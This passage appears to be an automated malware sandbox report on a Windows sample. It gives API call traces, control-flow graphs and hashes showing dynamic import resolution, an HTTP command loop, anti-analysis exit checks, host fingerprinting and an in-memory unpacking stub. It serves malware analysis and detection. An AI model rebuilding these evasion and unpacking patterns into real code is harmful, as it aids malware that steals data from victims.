                                      • GetProcAddress.KERNEL32(750F0000,0068A620), ref: 0041A2CB
                                      • GetProcAddress.KERNEL32(750F0000,006BF210), ref: 0041A2E3
                                      • GetProcAddress.KERNEL32(750F0000,00685EB8), ref: 0041A2FC
                                      • GetProcAddress.KERNEL32(750F0000,00685ED8), ref: 0041A314
                                      • GetProcAddress.KERNEL32(750F0000,0068A3C8), ref: 0041A32C
                                      • GetProcAddress.KERNEL32(75A50000,006BF078), ref: 0041A352
                                      • GetProcAddress.KERNEL32(75A50000,00685E78), ref: 0041A36A
                                      • GetProcAddress.KERNEL32(75A50000,00690040), ref: 0041A382
                                      • GetProcAddress.KERNEL32(75A50000,006BF228), ref: 0041A39B
                                      • GetProcAddress.KERNEL32(75A50000,006BF048), ref: 0041A3B3
                                      • GetProcAddress.KERNEL32(75A50000,00685F58), ref: 0041A3CB
                                      • GetProcAddress.KERNEL32(75A50000,00685F78), ref: 0041A3E4
                                      • GetProcAddress.KERNEL32(75A50000,006BF168), ref: 0041A3FC
                                      • GetProcAddress.KERNEL32(75A50000,006BF018), ref: 0041A414
                                      • GetProcAddress.KERNEL32(75070000,00685F98), ref: 0041A436
                                      • GetProcAddress.KERNEL32(75070000,006BF240), ref: 0041A44E
                                      • GetProcAddress.KERNEL32(75070000,006BF1B0), ref: 0041A466
                                      • GetProcAddress.KERNEL32(75070000,006BF288), ref: 0041A47F
                                      • GetProcAddress.KERNEL32(75070000,006BF138), ref: 0041A497
                                      • GetProcAddress.KERNEL32(74E50000,00686018), ref: 0041A4B8
                                      • GetProcAddress.KERNEL32(74E50000,00685D78), ref: 0041A4D1
                                      • GetProcAddress.KERNEL32(75320000,00686038), ref: 0041A4F2
                                      • GetProcAddress.KERNEL32(75320000,006BF150), ref: 0041A50A
                                      • GetProcAddress.KERNEL32(6F060000,00685FB8), ref: 0041A530
                                      • GetProcAddress.KERNEL32(6F060000,00685D98), ref: 0041A548
                                      • GetProcAddress.KERNEL32(6F060000,00685FD8), ref: 0041A560
                                      • GetProcAddress.KERNEL32(6F060000,006BF180), ref: 0041A579
                                      • GetProcAddress.KERNEL32(6F060000,00685FF8), ref: 0041A591
                                      • GetProcAddress.KERNEL32(6F060000,00686098), ref: 0041A5A9
                                      • GetProcAddress.KERNEL32(6F060000,00685DF8), ref: 0041A5C2
                                      • GetProcAddress.KERNEL32(6F060000,00685E18), ref: 0041A5DA
                                      • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 0041A5F1
                                      • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 0041A607
                                      • GetProcAddress.KERNEL32(74E00000,006BF0A8), ref: 0041A629
                                      • GetProcAddress.KERNEL32(74E00000,00690030), ref: 0041A641
                                      • GetProcAddress.KERNEL32(74E00000,006BF2A0), ref: 0041A659
                                      • GetProcAddress.KERNEL32(74E00000,006BF198), ref: 0041A672
                                      • GetProcAddress.KERNEL32(74DF0000,00685E38), ref: 0041A693
                                      • GetProcAddress.KERNEL32(6F9A0000,006BF0C0), ref: 0041A6B4
                                      • GetProcAddress.KERNEL32(6F9A0000,00685E58), ref: 0041A6CD
                                      • GetProcAddress.KERNEL32(6F9A0000,006BF0D8), ref: 0041A6E5
                                      • GetProcAddress.KERNEL32(6F9A0000,006BF258), ref: 0041A6FD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$LibraryLoad
                                      • String ID: 8]h$8^h$8_h$8`h$8dh$HttpQueryInfoA$InternetSetOptionA$X]h$X^h$X_h$X`h$Xah$Xdh$x]h$x^h$x_h$x`h$xdh
                                      • API String ID: 2238633743-574649150
                                      • Opcode ID: 62050089a8b8835eafd1d37742ef1b979ae5b20786234f8d6d940be7715c0619
                                      • Instruction ID: b148544ec257a615b167952e2e9b89b3667e8f5620887ecf26b211dda149ff7d
                                      • Opcode Fuzzy Hash: 62050089a8b8835eafd1d37742ef1b979ae5b20786234f8d6d940be7715c0619
                                      • Instruction Fuzzy Hash: 02621DBD5C0200BFD364DFE8EE889A63BFBF74E701714A61AE609C3264D6399441DB52

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 999 406280-40630b call 41a7a0 call 4047b0 call 41a740 InternetOpenA StrCmpCA 1006 406314-406318 999->1006 1007 40630d 999->1007 1008 406509-406525 call 41a7a0 call 41a800 * 2 1006->1008 1009 40631e-406342 InternetConnectA 1006->1009 1007->1006 1027 406528-40652d 1008->1027 1010 406348-40634c 1009->1010 1011 4064ff-406503 InternetCloseHandle 1009->1011 1014 40635a 1010->1014 1015 40634e-406358 1010->1015 1011->1008 1017 406364-406392 HttpOpenRequestA 1014->1017 1015->1017 1019 4064f5-4064f9 InternetCloseHandle 1017->1019 1020 406398-40639c 1017->1020 1019->1011 1022 4063c5-406405 HttpSendRequestA HttpQueryInfoA 1020->1022 1023 40639e-4063bf InternetSetOptionA 1020->1023 1025 406407-406427 call 41a740 call 41a800 * 2 1022->1025 1026 40642c-40644b call 418940 1022->1026 1023->1022 1025->1027 1033 4064c9-4064e9 call 41a740 call 41a800 * 2 1026->1033 1034 40644d-406454 1026->1034 1033->1027 1037 406456-406480 InternetReadFile 1034->1037 1038 4064c7-4064ef InternetCloseHandle 1034->1038 1042 406482-406489 1037->1042 1043 40648b 1037->1043 1038->1019 1042->1043 1046 40648d-4064c5 call 41a9b0 call 41a8a0 call 41a800 1042->1046 1043->1038 1046->1037
                                      APIs
                                        • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                        • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                        • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                        • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                        • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                        • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                                      • StrCmpCA.SHLWAPI(?,006C0DE0), ref: 00406303
                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                                      • HttpOpenRequestA.WININET(00000000,GET,?,006C04D0,00000000,00000000,00400100,00000000), ref: 00406385
                                      • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                                      • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                                      • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 004063FD
                                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040646D
                                      • InternetCloseHandle.WININET(00000000), ref: 004064EF
                                      • InternetCloseHandle.WININET(00000000), ref: 004064F9
                                      • InternetCloseHandle.WININET(00000000), ref: 00406503
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                      • String ID: ERROR$ERROR$GET$l
                                      • API String ID: 3074848878-768840641
                                      • Opcode ID: 74f4209007b577ccc48e8c0826d09269495c13b7839733709352ef9982036ea0
                                      • Instruction ID: 4c22ad93782da972e928cd377ef6cc95e5ae9f8df18decad01f21c65d1bf8a87
                                      • Opcode Fuzzy Hash: 74f4209007b577ccc48e8c0826d09269495c13b7839733709352ef9982036ea0
                                      • Instruction Fuzzy Hash: C1718075A00218ABDB24EFE0DC49BEE7775FB44700F10816AF50A6B1D0DBB86A85CF56

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1056 415510-415577 call 415ad0 call 41a820 * 3 call 41a740 * 4 1072 41557c-415583 1056->1072 1073 415585-4155b6 call 41a820 call 41a7a0 call 401590 call 4151f0 1072->1073 1074 4155d7-41564c call 41a740 * 2 call 401590 call 4152c0 call 41a8a0 call 41a800 call 41aad0 StrCmpCA 1072->1074 1090 4155bb-4155d2 call 41a8a0 call 41a800 1073->1090 1100 415693-4156a9 call 41aad0 StrCmpCA 1074->1100 1104 41564e-41568e call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1074->1104 1090->1100 1105 4157dc-415844 call 41a8a0 call 41a820 * 2 call 401670 call 41a800 * 4 call 416560 call 401550 1100->1105 1106 4156af-4156b6 1100->1106 1104->1100 1236 415ac3-415ac6 1105->1236 1110 4157da-41585f call 41aad0 StrCmpCA 1106->1110 1111 4156bc-4156c3 1106->1111 1130 415991-4159f9 call 41a8a0 call 41a820 * 2 call 401670 call 41a800 * 4 call 416560 call 401550 1110->1130 1131 415865-41586c 1110->1131 1115 4156c5-415719 call 41a820 call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1111->1115 1116 41571e-415793 call 41a740 * 2 call 401590 call 4152c0 call 41a8a0 call 41a800 call 41aad0 StrCmpCA 1111->1116 1115->1110 1116->1110 1216 415795-4157d5 call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1116->1216 1130->1236 1137 415872-415879 1131->1137 1138 41598f-415a14 call 41aad0 StrCmpCA 1131->1138 1145 4158d3-415948 call 41a740 * 2 call 401590 call 4152c0 call 41a8a0 call 41a800 call 41aad0 StrCmpCA 1137->1145 1146 41587b-4158ce call 41a820 call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1137->1146 1167 415a16-415a21 Sleep 1138->1167 1168 415a28-415a91 call 41a8a0 call 41a820 * 2 call 401670 call 41a800 * 4 call 416560 call 401550 1138->1168 1145->1138 1241 41594a-41598a call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1145->1241 1146->1138 1167->1072 1168->1236 1216->1110 1241->1138
                                      APIs
                                        • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,00690100,?,0042110C,?,00000000), ref: 0041A82B
                                        • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415644
                                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004156A1
                                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415857
                                        • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                        • Part of subcall function 004151F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415228
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                        • Part of subcall function 004152C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415318
                                        • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 0041532F
                                        • Part of subcall function 004152C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00415364
                                        • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 00415383
                                        • Part of subcall function 004152C0: strtok.MSVCRT(00000000,?), ref: 0041539E
                                        • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 004153AE
                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041578B
                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415940
                                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415A0C
                                      • Sleep.KERNEL32(0000EA60), ref: 00415A1B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpylstrlen$Sleepstrtok
                                      • String ID: 8ah$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                      • API String ID: 3630751533-2389212057
                                      • Opcode ID: 95f0fc00100f30bd4b73b87d77ac1ad8fe0b2bd46b58b2d7260737c8619ee5eb
                                      • Instruction ID: 0baa471f6470c30cedeccf0ca5f41b7a1b3666a88d5ff2061c329f06e4daefd3
                                      • Opcode Fuzzy Hash: 95f0fc00100f30bd4b73b87d77ac1ad8fe0b2bd46b58b2d7260737c8619ee5eb
                                      • Instruction Fuzzy Hash: 5BE18675910104AACB04FBB1DD52EED733DAF54314F50812EB406660D1EF3CAB9ACBAA

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1267 4117a0-4117cd call 41aad0 StrCmpCA 1270 4117d7-4117f1 call 41aad0 strtok_s 1267->1270 1271 4117cf-4117d1 ExitProcess 1267->1271 1274 4117f4-4117f8 1270->1274 1275 4119c2-4119cd call 41a800 1274->1275 1276 4117fe-411811 1274->1276 1278 411817-41181a 1276->1278 1279 41199e-4119bd strtok_s 1276->1279 1281 411821-411830 call 41a820 1278->1281 1282 411849-411858 call 41a820 1278->1282 1283 4118ad-4118be StrCmpCA 1278->1283 1284 4118cf-4118e0 StrCmpCA 1278->1284 1285 41198f-411999 call 41a820 1278->1285 1286 4118f1-411902 StrCmpCA 1278->1286 1287 411951-411962 StrCmpCA 1278->1287 1288 411970-411981 StrCmpCA 1278->1288 1289 411913-411924 StrCmpCA 1278->1289 1290 411932-411943 StrCmpCA 1278->1290 1291 411835-411844 call 41a820 1278->1291 1292 41185d-41186e StrCmpCA 1278->1292 1293 41187f-411890 StrCmpCA 1278->1293 1279->1274 1281->1279 1282->1279 1310 4118c0-4118c3 1283->1310 1311 4118ca 1283->1311 1312 4118e2-4118e5 1284->1312 1313 4118ec 1284->1313 1285->1279 1314 411904-411907 1286->1314 1315 41190e 1286->1315 1298 411964-411967 1287->1298 1299 41196e 1287->1299 1301 411983-411986 1288->1301 1302 41198d 1288->1302 1294 411930 1289->1294 1295 411926-411929 1289->1295 1296 411945-411948 1290->1296 1297 41194f 1290->1297 1291->1279 1306 411870-411873 1292->1306 1307 41187a 1292->1307 1308 411892-41189c 1293->1308 1309 41189e-4118a1 1293->1309 1294->1279 1295->1294 1296->1297 1297->1279 1298->1299 1299->1279 1301->1302 1302->1279 1306->1307 1307->1279 1319 4118a8 1308->1319 1309->1319 1310->1311 1311->1279 1312->1313 1313->1279 1314->1315 1315->1279 1319->1279
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExitProcessstrtok_s
                                      • String ID: block
                                      • API String ID: 3407564107-2199623458
                                      • Opcode ID: 31160efdca7bf48b69b5a6bd97d33fb6c5fabe7ffbf706427cbe04744fdb8866
                                      • Instruction ID: 00bb13bb87ecd4f31d5cbb7361e66ee12f2c4d363b15aa8138e6c51e0cba8311
                                      • Opcode Fuzzy Hash: 31160efdca7bf48b69b5a6bd97d33fb6c5fabe7ffbf706427cbe04744fdb8866
                                      • Instruction Fuzzy Hash: AC517DB4A10209EFCB04DFA1D954BFE77B6BF44304F10804AE516A7361D778E992CB6A

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1320 417500-41754a GetWindowsDirectoryA 1321 417553-4175c7 GetVolumeInformationA call 418d00 * 3 1320->1321 1322 41754c 1320->1322 1329 4175d8-4175df 1321->1329 1322->1321 1330 4175e1-4175fa call 418d00 1329->1330 1331 4175fc-417617 GetProcessHeap HeapAlloc 1329->1331 1330->1329 1333 417619-417626 call 41a740 1331->1333 1334 417628-417658 wsprintfA call 41a740 1331->1334 1341 41767e-41768e 1333->1341 1334->1341
                                      APIs
                                      • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00417542
                                      • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041757F
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417603
                                      • HeapAlloc.KERNEL32(00000000), ref: 0041760A
                                      • wsprintfA.USER32 ref: 00417640
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                      • String ID: :$C$\
                                      • API String ID: 3790021787-3809124531
                                      • Opcode ID: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                      • Instruction ID: 2fa5a76c25c4840d12821100fc964cf287d391274576238511e757cc0c078ff1
                                      • Opcode Fuzzy Hash: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                      • Instruction Fuzzy Hash: BF41A2B5D44248ABDB10DF94DC45BEEBBB9EF08714F10019DF50967280D778AA84CBA9

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1342 22d003c-22d0047 1343 22d004c-22d0263 call 22d0a3f call 22d0e0f call 22d0d90 VirtualAlloc 1342->1343 1344 22d0049 1342->1344 1359 22d028b-22d0292 1343->1359 1360 22d0265-22d0289 call 22d0a69 1343->1360 1344->1343 1362 22d02a1-22d02b0 1359->1362 1364 22d02ce-22d03c2 VirtualProtect call 22d0cce call 22d0ce7 1360->1364 1362->1364 1365 22d02b2-22d02cc 1362->1365 1371 22d03d1-22d03e0 1364->1371 1365->1362 1372 22d0439-22d04b8 VirtualFree 1371->1372 1373 22d03e2-22d0437 call 22d0ce7 1371->1373 1374 22d04be-22d04cd 1372->1374 1375 22d05f4-22d05fe 1372->1375 1373->1371 1378 22d04d3-22d04dd 1374->1378 1379 22d077f-22d0789 1375->1379 1380 22d0604-22d060d 1375->1380 1378->1375 1382 22d04e3-22d0505 1378->1382 1383 22d078b-22d07a3 1379->1383 1384 22d07a6-22d07b0 1379->1384 1380->1379 1385 22d0613-22d0637 1380->1385 1393 22d0517-22d0520 1382->1393 1394 22d0507-22d0515 1382->1394 1383->1384 1386 22d086e-22d08be LoadLibraryA 1384->1386 1387 22d07b6-22d07cb 1384->1387 1388 22d063e-22d0648 1385->1388 1392 22d08c7-22d08f9 1386->1392 1390 22d07d2-22d07d5 1387->1390 1388->1379 1391 22d064e-22d065a 1388->1391 1395 22d0824-22d0833 1390->1395 1396 22d07d7-22d07e0 1390->1396 1391->1379 1397 22d0660-22d066a 1391->1397 1398 22d08fb-22d0901 1392->1398 1399 22d0902-22d091d 1392->1399 1400 22d0526-22d0547 1393->1400 1394->1400 1404 22d0839-22d083c 1395->1404 1401 22d07e4-22d0822 1396->1401 1402 22d07e2 1396->1402 1403 22d067a-22d0689 1397->1403 1398->1399 1405 22d054d-22d0550 1400->1405 1401->1390 1402->1395 1406 22d068f-22d06b2 1403->1406 1407 22d0750-22d077a 1403->1407 1404->1386 1408 22d083e-22d0847 1404->1408 1410 22d0556-22d056b 1405->1410 1411 22d05e0-22d05ef 1405->1411 1412 22d06ef-22d06fc 1406->1412 1413 22d06b4-22d06ed 1406->1413 1407->1388 1414 22d0849 1408->1414 1415 22d084b-22d086c 1408->1415 1418 22d056d 1410->1418 1419 22d056f-22d057a 1410->1419 1411->1378 1416 22d06fe-22d0748 1412->1416 1417 22d074b 1412->1417 1413->1412 1414->1386 1415->1404 1416->1417 1417->1403 1418->1411 1422 22d057c-22d0599 1419->1422 1423 22d059b-22d05bb 1419->1423 1426 22d05bd-22d05db 1422->1426 1423->1426 1426->1405
                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 022D024D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2247593788.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_22d0000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID: cess$kernel32.dll
                                      • API String ID: 4275171209-1230238691
                                      • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                      • Instruction ID: 843d15250191d38fba398d3ca70026578c5ac18b496f9cfb788fbf15331d557a
                                      • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                      • Instruction Fuzzy Hash: 9D525C74A11229DFDB64CF98C984BACBBB1BF09314F1480D9E54DAB365DB30AA85CF14

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00690DF0), ref: 004198A1
                                        • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00690C88), ref: 004198BA
                                        • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00690D30), ref: 004198D2
                                        • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00690B50), ref: 004198EA
                                        • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00690B98), ref: 00419903
                                        • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00690140), ref: 0041991B
                                        • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00686178), ref: 00419933
                                        • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,006862B8), ref: 0041994C
                                        • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00690B68), ref: 00419964
                                        • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00690D60), ref: 0041997C
                                        • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00690CD0), ref: 00419995
                                        • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00690C28), ref: 004199AD
                                        • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,006861D8), ref: 004199C5
                                        • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00690B80), ref: 004199DE
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • Part of subcall function 004011D0: ExitProcess.KERNEL32 ref: 00401211
                                        • Part of subcall function 00401160: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416A17,00420AEF), ref: 0040116A
                                        • Part of subcall function 00401160: ExitProcess.KERNEL32 ref: 0040117E
                                        • Part of subcall function 00401110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416A1C), ref: 0040112B
                                        • Part of subcall function 00401110: VirtualAllocExNuma.KERNEL32(00000000,?,?,00416A1C), ref: 00401132
                                        • Part of subcall function 00401110: ExitProcess.KERNEL32 ref: 00401143
                                        • Part of subcall function 00401220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
                                        • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401258
                                        • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401266
                                        • Part of subcall function 00401220: ExitProcess.KERNEL32 ref: 00401294
                                        • Part of subcall function 00416770: GetUserDefaultLangID.KERNEL32(?,?,00416A26,00420AEF), ref: 00416774
                                      • GetUserDefaultLCID.KERNEL32 ref: 00416A26
                                        • Part of subcall function 00401190: ExitProcess.KERNEL32 ref: 004011C6
                                        • Part of subcall function 00417850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                                        • Part of subcall function 00417850: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                                        • Part of subcall function 00417850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                                        • Part of subcall function 004178E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                                        • Part of subcall function 004178E0: HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                                        • Part of subcall function 004178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                      • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00690100,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416ACA
                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416AE8
                                      • CloseHandle.KERNEL32(00000000), ref: 00416AF9
                                      • Sleep.KERNEL32(00001770), ref: 00416B04
                                      • CloseHandle.KERNEL32(?,00000000,?,00690100,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416B1A
                                      • ExitProcess.KERNEL32 ref: 00416B22
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$Process$Exit$Heap$AllocUserlstrcpy$CloseDefaultEventHandleName__aulldiv$ComputerCreateCurrentGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                      • String ID:
